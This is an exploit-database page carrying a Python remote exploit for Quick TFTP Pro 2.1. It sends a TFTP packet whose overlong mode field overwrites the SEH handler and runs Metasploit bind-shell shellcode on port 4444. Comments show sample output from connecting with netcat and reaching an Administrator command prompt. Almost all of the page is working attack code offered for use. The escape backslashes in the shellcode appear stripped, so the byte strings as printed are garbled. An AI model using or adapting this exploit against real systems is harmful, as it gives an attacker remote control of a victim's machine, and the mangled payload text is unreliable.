Quick TFTP Pro 2.1 Remote SEH Overflow Exploit (0day)

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Quick TFTP Pro 2.1 Remote SEH Overflow Exploit (0day)
# Published : 2008-03-26
# Author : muts
# Previous Title : ZyXEL ZyWALL Quagga/Zebra (default pass) Remote Root Vulnerability
# Next Title : Sun Solaris <= 10 rpc.ypupdated Remote Root Exploit

#!/usr/bin/python
# Quick TFTP Pro 2.1 SEH Overflow (0day)
# Tested on Windows XP SP2. 
# Coded by Mati Aharoni
# muts..at..offensive-security.com
# http://www.offensive-security.com/0day/quick-tftp-poc.py.txt
#########################################################
# bt ~ # quickftp.py
# [*] Quick TFTP Pro 2.1 SEH Overflow (0day)
# [*] http://www.offensive-security.com
# [*] Sending evil packet, ph33r
# [*] Check port 4444 for bindshell
# bt ~ # nc -v 172.16.167.130 4444
# (UNKNOWN) [172.16.167.130] 4444 (krb524) open
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:Documents and SettingsAdministrator>
##########################################################
import socket
import sys

print "[*] Quick TFTP Pro 2.1 SEH Overflow (0day)"
print "[*] http://www.offensive-security.com"

host = '172.16.167.134'
port = 69

try:
   s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
except:
   print "socket() failed"
   sys.exit(1)

filename = "pwnd"

# windows/shell_bind_tcp - 317 bytes
# http://www.metasploit.com
# EXITFUNC=thread, LPORT=4444

shell=("xfcx6axebx4dxe8xf9xffxffxffx60x8bx6cx24x24x8b"
"x45x3cx8bx7cx05x78x01xefx8bx4fx18x8bx5fx20x01"
"xebx49x8bx34x8bx01xeex31xc0x99xacx84xc0x74x07"
"xc1xcax0dx01xc2xebxf4x3bx54x24x28x75xe5x8bx5f"
"x24x01xebx66x8bx0cx4bx8bx5fx1cx01xebx03x2cx8b"
"x89x6cx24x1cx61xc3x31xdbx64x8bx43x30x8bx40x0c"
"x8bx70x1cxadx8bx40x08x5ex68x8ex4ex0execx50xff"
"xd6x66x53x66x68x33x32x68x77x73x32x5fx54xffxd0"
"x68xcbxedxfcx3bx50xffxd6x5fx89xe5x66x81xedx08"
"x02x55x6ax02xffxd0x68xd9x09xf5xadx57xffxd6x53"
"x53x53x53x53x43x53x43x53xffxd0x66x68x11x5cx66"
"x53x89xe1x95x68xa4x1ax70xc7x57xffxd6x6ax10x51"
"x55xffxd0x68xa4xadx2exe9x57xffxd6x53x55xffxd0"
"x68xe5x49x86x49x57xffxd6x50x54x54x55xffxd0x93"
"x68xe7x79xc6x79x57xffxd6x55xffxd0x66x6ax64x66"
"x68x63x6dx89xe5x6ax50x59x29xccx89xe7x6ax44x89"
"xe2x31xc0xf3xaaxfex42x2dxfex42x2cx93x8dx7ax38"
"xabxabxabx68x72xfexb3x16xffx75x44xffxd6x5bx57"
"x52x51x51x51x6ax01x51x51x55x51xffxd0x68xadxd9"
"x05xcex53xffxd6x6axffxffx37xffxd0x8bx57xfcx83"
"xc4x64xffxd6x52xffxd0x68xefxcexe0x60x53xffxd6"
"xffxd0")

mode = "A"*1019+"xebx08x90x90"+"x58x14xd3x74"+"x90"*16+shell

muha = "x00x02" + filename+ "" + mode + "" 

print "[*] Sending evil packet, ph33r"
s.sendto(muha, (host, port))
print "[*] Check port 4444 for bindshell"

# www.Syue.com [2008-03-26]